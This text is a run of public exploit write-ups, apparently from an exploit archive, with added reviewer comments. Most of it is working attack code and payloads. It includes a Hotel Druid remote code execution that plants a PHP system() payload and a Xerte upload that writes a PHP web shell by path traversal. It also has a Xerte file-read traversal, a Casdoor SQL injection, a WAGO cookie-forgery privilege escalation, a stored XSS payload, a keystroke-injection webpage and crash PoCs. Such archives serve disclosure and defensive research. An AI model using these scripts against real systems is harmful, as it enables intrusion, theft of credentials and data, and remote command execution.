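    clear()
    print("""  
      [-] -----------------------------------------[-]
      [+]             WwW.1877.TeaM
      [-] -----------------------------------------[-]
                          \n \n""")
    file_name = input("Website List : ")
    with open(file_name, 'r') as handle:
        targets = [entry.strip() for entry in handle.read().splitlines()]
    try:
        threads = int(input('Thread : '))
    except ValueError:
        print("Thread count must be a number")
        sys.exit(1)
    p = Pool(threads)
    p.map(finder, targets)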

run()  # runs unconditionally at import time - this script has no __main__ guard
            
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909

#!/usr/bin/python3
import requests
import argparse

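def login( target , username = "" , password = "", noauth=False):
	"""Authenticate to HotelDruid (or fetch the public page) and extract the session token and year.

	Args:
		target: Base URL of the HotelDruid install, without trailing slash.
		username, password: Credentials posted to inizio.php when ``noauth`` is False.
		noauth: When True, skip authentication and only scrape the ``anno``
			hidden field from the public page; ``token`` is returned empty.

	Returns:
		dict with ``token`` (id_sessione) and ``anno``, or False when the
		expected markers are missing from the response.

	Note: TLS verification is disabled (verify=False) like the rest of the
	script. requests network errors propagate to the caller.
	"""
	login_data = {
				"vers_hinc" : "1",
				"nome_utente_phpr" : username,
				"password_phpr" : password
				}
	session_marker = '<a class="nav" id="nb_men" href="./inizio.php?id_sessione='
	anno_marker = '<input type="hidden" name="anno" value="'
	if noauth:
		page = requests.get(f"{target}/inizio.php" , verify=False ).text
		token = ""
	else:
		page = requests.post(f"{target}/inizio.php" , data=login_data , verify=False ).text
		if session_marker not in page:
			return False
		token = page.split(session_marker)[1].split('">&nbsp;<b>')[0]
	try:
		# Bug fix: a page without the anno field raised an uncaught IndexError on the
		# authenticated path and was hidden by a bare except on the noauth path.
		anno = page.split(anno_marker)[1].split('">')[0]
	except IndexError:
		return False
	return {"token" : token , "anno" : anno}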

def check_privilege(target , anno , token=""):
	"""Return True when the apartments table page offers a "Modify" control to this session.

	The literal word "Modify" in visualizza_tabelle.php is used as the indicator that
	the session is allowed to add rooms. ``anno`` is accepted for call-site symmetry but
	is not used.
	"""
	# NOTE(review): TLS verification disabled, as in login().
	priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
	#print(priv_req.text)
	if "Modify" in priv_req.text:
		return True
	else:
		return False

def add_room(target , anno , token=""):
	"""Submit the "create apartment" form with the PHP payload as the room name.

	Returns True when the response contains "has been added", i.e. the value was
	stored. The vulnerable sink is the stored room name (``n_app``): judging by
	test_code_execution(), the server appears to emit it into
	dati/selectappartamenti.php where it is evaluated as PHP. The defensive fix is to
	treat ``n_app`` strictly as data (allow-list its characters) and never write
	user-supplied values into executable PHP source.
	"""
	add_room_data = { 
				"anno": anno,
				"id_sessione": token,
				"n_app":"{${system($_REQUEST['cmd'])}}",
				"crea_app":"SI",
				"crea_letti":"",
				"n_letti":"",
				"tipo_tabella":"appartamenti"
				}
	# NOTE(review): TLS verification disabled, as in login().
	add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
	#print(add_req.text)
	if "has been added" in add_req.text:
		return True
	else:
		return False
def test_code_execution(target):
	"""Probe dati/selectappartamenti.php with ``cmd=id`` and return the first output line.

	Returns the first line of the response body when it contains "uid=" (the Unix
	`id` command ran), otherwise False. main() notes that Windows targets will not
	match this marker.
	"""
	# NOTE(review): the only request in this file that keeps default TLS verification;
	# inconsistent with the verify=False used by every other request.
	code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
	if "uid=" in code_execution_req.text:
		return code_execution_req.text.split("\n")[0]
	else:
		return False


def main():
	"""CLI driver: parse arguments, log in (or not), check privilege, plant the room
	and probe for execution. Every failure path terminates the process.

	NOTE(review): failures mix quit() and exit(); both are site-module helpers meant
	for the interactive prompt — sys.exit(1) would also give a non-zero status.
	"""

	banner = """\n /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
	

	parser = argparse.ArgumentParser()
	req_args = parser.add_argument_group('required arguments')
	# NOTE(review): only -t is required; -u/-p/--noauth are optional yet are listed
	# under the group titled 'required arguments'.
	req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
	req_args.add_argument("-u" , "--username" , help="Username" , required=False)
	req_args.add_argument("-p" , "--password" , help="password", required=False)
	req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
	args = parser.parse_args()                                                                         

	target = args.target
	# Strip one trailing slash so the f-strings in the helpers do not produce "//".
	# NOTE(review): `-t ""` raises IndexError here.
	if target[-1] == "/":
		target = target[:-1]
	noauth = args.noauth

	username = args.username
	password = args.password

	# NOTE(review): idiomatic form is `if not noauth and (username is None or password is None)`.
	if noauth == False and (username == None or password == None):
		print('[-] Please provide the authentication method.' )
		quit()

	print(banner)
	if not noauth:
		# The supplied credentials are echoed to stdout here.
		print(f"[*] Logging in with the credential {username}:{password}")
		login_result = login(username = username , password = password , target = target)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno')
		else:
			print("[-] Login failed, Check your credential or check if login is required or not .")
			quit()
	else:
		print('[*] Trying to access the Dashboard.')
		# username/password are None in this branch; login() ignores them when noauth=True.
		login_result = login(username = username , password = password , target = target , noauth=True)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno') 
		else:
			print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
			exit()
	print("[*] Checking the privilege of the user.")
	if check_privilege(target= target , token=token , anno=anno):
		print("[+] User has the privilege to add room.")
	else:
		print("[-] User doesn't have the privilege to add room.")
		exit()
	print("[*] Adding a new room.")
	if add_room(target = target , anno=anno , token=token):
		print('[+] Room has been added successfully.')
	else:
		print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
		exit()
	print('[*] Testing code exection')
	output = test_code_execution(target = target)
	if output != False:
		print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
		print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
		print(f"[+] Example Output : {output}")
		exit()
	else:
		print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
		exit()
# Module-level entry point: runs on import, no `if __name__ == "__main__":` guard.
main()
            
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu

When a user adds a new server on the "Server" panel, the "name" parameter is
not filtered in any way.

POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}
            
# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
# Tested Version: 3.5.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Steps to discover the Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """

Wondershare Driver Install Service help		ElevationService	C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe	Auto


# Service info:

C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
            
# Exploit Title: Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/crSetup-0.9.93-RC1.exe
# Tested Version: 0.9.93 RC1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Reflector_0.9.93_RC1.py
# 2.- Open Cobian_Reflector_0.9.93_RC1.txt and copy content to clipboard
# 3.- Open "Cobian Reflector User Interface"
# 4.- Task -> "New task"
# 5.- Files -> Source "Add" -> SFTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 22
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Test settings
# 11.- Yes
# 12.- Crashed

#!/usr/bin/env python

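# Over-long "Password" value (8000 x 'A') for the manual steps above; it is written
# to a text file so it can be pasted into the SFTP source dialog.
buffer = "\x41" * 8000
# `with` guarantees the handle is closed even if write() raises; the original
# open()/write()/close() sequence leaked it on error.
with open("Cobian_Reflector_0.9.93_RC1.txt", "w") as f:
    f.write(buffer)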
            
# Exploit Title: Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-16
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link: https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Cobian_Backup_11.2.0.582.py
# 2.- Open Cobian_Backup_11.2.0.582.txt and copy content to clipboard
# 3.- Open "Cobian Backup 11 Gravity User Interface"
# 4.- Task -> "New task"
# 5.- File -> Source "Add" -> FTP
# 6.- Host -> 10.10.10.10
# 7.- Port-> 21
# 8.- User name -> admin
# 9.- Paste ClipBoard on "Password"
# 10.- Ok
# 11.- Crashed

#!/usr/bin/env python

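# Over-long "Password" value (800 x 'A') for the manual steps above; it is written
# to a text file so it can be pasted into the FTP source dialog.
buffer = "\x41" * 800
# `with` guarantees the handle is closed even if write() raises; the original
# open()/write()/close() sequence leaked it on error.
with open("Cobian_Backup_11.2.0.582.txt", "w") as f:
    f.write(buffer)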
            
# Exploit Title: Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-24
# Vendor Homepage: https://www.cobiansoft.com/
# Software Link : https://files.cobiansoft.com/programs/cbSetup.exe
# Tested Version: 11.2.0.582
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Steps to discover the Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Gravity " | findstr /i /v """


Cobian Backup 11 Gravity	CobianBackup11	C:\Program Files (x86)\Cobian Backup 11\cbService.exe	Auto


# Service info:

C:\>sc qc CobianBackup11
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CobianBackup11
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Cobian Backup 11\cbService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cobian Backup 11 Gravity
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
            
// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124

// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
)

// main sends one crafted get-organizations request and prints the MySQL version
// leaked through an error-based injection in the `field` query parameter.
// Exit status is 1 when the error marker is not found in the response.
func main() {
	// -u is taken as-is; no scheme or format validation is done on it.
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=- 
- by Mayank Deshmukh (ColdFusionX)

`
	// NOTE(review): banner is used as the format string; fmt.Print(banner) would
	// avoid misinterpreting any '%' that is added to it later (go vet flags this).
	fmt.Printf(banner)
	fmt.Println("[*] Dumping Database Version")
	// The unauthenticated endpoint appears to splice `field` into SQL unsanitized:
	// updatexml(null,version(),null) makes MySQL raise an XPATH syntax error whose
	// message carries version(). Fixed in 1.13.1 per the header. Defenders can alert on
	// "XPATH syntax error" in application responses or on updatexml(/extractvalue( in
	// request query strings.
	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")

	if err != nil {
		panic(err)
	}

	defer response.Body.Close()

	// NOTE(review): ioutil.ReadAll is deprecated since Go 1.16; io.ReadAll is the replacement.
	databytes, err := ioutil.ReadAll(response.Body)

	if err != nil {
		panic(err)
	}

	content := string(databytes)

	// Match from the error marker up to the HTML-escaped closing quote (&#39).
	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")

	result := re.FindAllString(content, -1)
	
	// Strip the slice brackets from fmt.Sprint's rendering plus the escaped quote and
	// stray semicolons, then unescape any remaining HTML entities.
	sqliop := fmt.Sprint(result)
	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
	
	finalop := replacer.Replace(sqliop)
	// Printed before the nil check, so a non-vulnerable target prints an empty line first.
	fmt.Println(html.UnescapeString(finalop))


	if result == nil {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}

}
            
# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
# Date: 02/16/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB
# Vendor Homepage: https://www.wago.com
# Version: Firmware version 03.05.10(17)
# Tested on: PopOS! [Linux](Firefox)

========================================
= The ordinary user privilege request:
========================================

GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}

==========================================
= Manipulated Cookie to Admin Privilege:
==========================================

GET /wbm/ HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.1/wbm/
Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}
            
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP 
# CVE : CVE-2021-44664

# This PoC assumes guest login is enabled and the en-GB language files are used.
# This PoC will overwrite the existing language file (.inc) for the English index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded file.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota

import requests
import re

xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

# Flat script: everything below runs at import time against xerte_base_url.
with requests.Session() as session:
    # Get a PHP session ID (presumably the front page sets PHPSESSID for guests)
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to find the install path
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    # NOTE(review): '(\d+)' is not a raw string, so `\d` is an invalid escape sequence
    # (DeprecationWarning on Python 3.6+); use r'(\d+)'. The [0] raises IndexError
    # when the response contains no digits.
    data = {
        'template_id': re.findall('(\d+)', template_id.text)[0]
    }

    # Find the install path: the media-and-quota page echoes the server-side media
    # directory in the hidden "mediapath" input.
    install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]

    # Hand-built multipart request; the boundary here must match the one used in `data`.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
        'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
       }

    # Multipart body. Part 1 uploads "index.inc": a copy of the en-GB index language
    # file with a one-line command shell prepended. Part 2 sets mediapath to the
    # echoed install path plus "../../../languages/en-GB/", so the server writes the
    # upload outside the project's media directory. The server-side flaw is trusting
    # the client-supplied mediapath; a defensive fix derives the destination from the
    # template id and rejects any path containing "..".
    # NOTE(review): line endings mix bare "\n" with literal backslash-r text rather
    # than real CRLF pairs; the server evidently tolerates it — confirm before reuse.
    data = \
    '''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream

<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
 *
 * index.php english language file
 *
 * @author Patrick Lockley
 * @version 1.0
 * @copyright Pat Lockley
 * @package
 */

define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");

define("INDEX_USERNAME_EMPTY", "Please enter your username");

define("INDEX_PASSWORD_EMPTY", "Please enter your password");

define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");

define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");

define("INDEX_LOGIN", "login area");

define("INDEX_USERNAME", "Username");

define("INDEX_PASSWORD", "Password");

define("INDEX_HELP_TITLE", "Getting Started");

define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");

define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");

define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");

define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");

define("INDEX_WORKSPACE_TITLE","My Projects");

define("INDEX_CREATE","Project Templates");

define("INDEX_DETAILS","Project Details");

define("INDEX_SORT","Sort");

define("INDEX_SEARCH","Search");

define("INDEX_SORT_A","Alphabetical A-Z");

define("INDEX_SORT_Z","Alphabetical Z-A");

define("INDEX_SORT_NEW","Age (New to Old)");

define("INDEX_SORT_OLD","Age (Old to New)");

define("INDEX_LOG_OUT","Log out");

define("INDEX_LOGGED_IN_AS","Logged in as");

define("INDEX_BUTTON_LOGIN","Login");

define("INDEX_BUTTON_LOGOUT","Logout");

define("INDEX_BUTTON_PROPERTIES","Properties");

define("INDEX_BUTTON_EDIT","Edit");

define("INDEX_BUTTON_PREVIEW", "Preview");

define("INDEX_BUTTON_SORT", "Sort");

define("INDEX_BUTTON_NEWFOLDER", "New Folder");

define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");

define("INDEX_BUTTON_DELETE", "Delete");

define("INDEX_BUTTON_DUPLICATE", "Duplicate");

define("INDEX_BUTTON_PUBLISH", "Publish");

define("INDEX_BUTTON_CANCEL", "Cancel");

define("INDEX_BUTTON_SAVE", "Save");

define("INDEX_XAPI_DASHBOARD_FROM", "From:");

define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");

define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");

define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");

define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");

define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");

define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");

define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");

define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");

define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"

''' \
    + install_path \
    + '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''

    # Overwrite index.inc file; the upload handler's reply is printed verbatim.
    response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
    print('Installation path: ' + install_path)
    print(response.text)
    # "success" anywhere in the reply is taken as confirmation that the file was written.
    if "success" in response.text:
        print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
            
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665

# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-directory>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-directory will be shown in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>

import requests
import re

xerte_base_url = "http://127.0.0.1"
# Relative path appended to the user directory; two levels up from USER-FILES/<dir>.
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.

# Flat script: everything below runs at import time against xerte_base_url.
with requests.Session() as session:
    # Get a PHP session ID (presumably the front page sets PHPSESSID for guests)
    if not php_session_id:
        session.get(xerte_base_url) 
    else:
        session.cookies.set("PHPSESSID", php_session_id)

    # Use a default template
    data = {
        'tutorialid': 'Nottingham',
        'templatename': 'Nottingham',
        'tutorialname': 'exploit',
        'folder_id': ''
    }

    # Create a new project in order to create a user-folder
    template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

    # Find template ID
    # NOTE(review): '(\d+)' is not a raw string, so `\d` is an invalid escape sequence
    # (DeprecationWarning on Python 3.6+); use r'(\d+)'. The [0] raises IndexError
    # when the response contains no digits.
    data = {
        'template_id': re.findall('(\d+)', template_id.text)[0]
    }

    # Find the created user-directory (the <numbers>-<username>-<templatename> folder
    # under USER-FILES) from the media-and-quota page.
    # NOTE(review): non-raw regex string again; [0] raises IndexError if no match.
    user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
    user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]

    # Grab file. The server-side flaw is that getfile.php does not canonicalise `file`
    # and confine it to the caller's USER-FILES directory; a defensive fix resolves the
    # real path and rejects anything outside that directory.
    result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
    print(result.text)
    print("|-- Used Variables: --|")
    # NOTE(review): KeyError here if the server never set a PHPSESSID cookie.
    print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
    print("user direcotry: " + user_direcotry)
    print("Curl example:")
    print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
            
# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10

# Prowise Reflect software version 1.0.9 for Windows is vulnerable to remote keystroke injection.
# Much like a rubber-ducky attack, but this one works either over the network (when port 8082 is exposed)
# or by having the victim visit a malicious website. This PoC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server, e.g. ygm7u6od
# 3. When it is connecting click exploit
#   - Start menu will open, types notepad.exe and types hello world.

<!DOCTYPE HTML>

<html>
   <head>
      
<script type = "text/javascript">

// Busy-wait for roughly `ms` milliseconds. Blocks the main thread (no setTimeout),
// which is what the caller relies on to pace consecutive ws.send() calls.
function wait(ms){
	var deadline = Date.now() + ms;
	var now = Date.now();
	while (now < deadline) {
		now = Date.now();
	}
}

// Opens a WebSocket to the Reflect client's local listener (port 8082) and streams
// "keyboard" events to it. Nothing in this page authenticates to the listener, so the
// PoC relies on the client accepting events from any page origin; the defensive fix
// on the client side is to check the Origin header / require a pairing token and to
// reject keyboard events while no user-initiated session is active.
function WebSocketTest() {
	// Declared but never read in this version of the PoC.
	var StateConnecting = new Boolean(false);
	if ("WebSocket" in window) {               
		// Let us open a web socket
		var ws = new WebSocket("ws://localhost:8082");

		ws.onopen = function() {

			// Open the Start menu, then type the program name one key event per character.
			ws.send('{"event":"keyboard", "key":"super"}');		  
			wait(400);
			//character is slower
			// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
			
			// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
			var exploitcode = "notepad.exe"
			for (let i = 0; i < exploitcode.length; i++) {
				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
			} 
			
			wait(300);
			ws.send('{"event":"keyboard", "key":"enter"}');
			// Give the launched program time to take focus before typing into it.
			wait(2000);
			exploitcode = "Hello world!"
			
			for (let i = 0; i < exploitcode.length; i++) {
				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
			} 
			wait(200);
		};

		ws.onmessage = function (evt) { 
			// Responses are read but discarded.
			var received_msg = evt.data;              
		};

		ws.onclose = function() { 

			// websocket is closed.
			alert("Connection is closed..."); 
		};
	} else {
		// The browser doesn't support WebSocket
		alert("WebSocket NOT supported by your Browser!");
	}
}
</script>
		
   </head>
   
   <body>
      <div id = "sse">
         <a href = "javascript:WebSocketTest()">Exploit!</a>
      </div>
      
   </body>
</html>
            
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
